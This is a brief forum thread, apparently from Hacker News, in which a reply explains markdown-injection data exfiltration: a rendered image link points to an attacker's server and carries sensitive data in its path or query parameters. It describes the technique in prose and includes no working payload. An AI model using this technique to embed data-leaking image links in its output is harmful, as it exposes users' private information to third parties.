Comment by oarsinsync
2 days ago
> a markdown file could transmit data when rendered.
This is a new threat vector to me. Can you tell me more?
2 days ago
> a markdown file could transmit data when rendered.
This is a new threat vector to me. Can you tell me more?
Not hypothetical: https://checkmarx.com/zero-post/exploiting-markdown-injectio...
Your markdown file has an image that links to another server controlled by the attacker and the path/query parameters you're attempting to render contains sensitive data.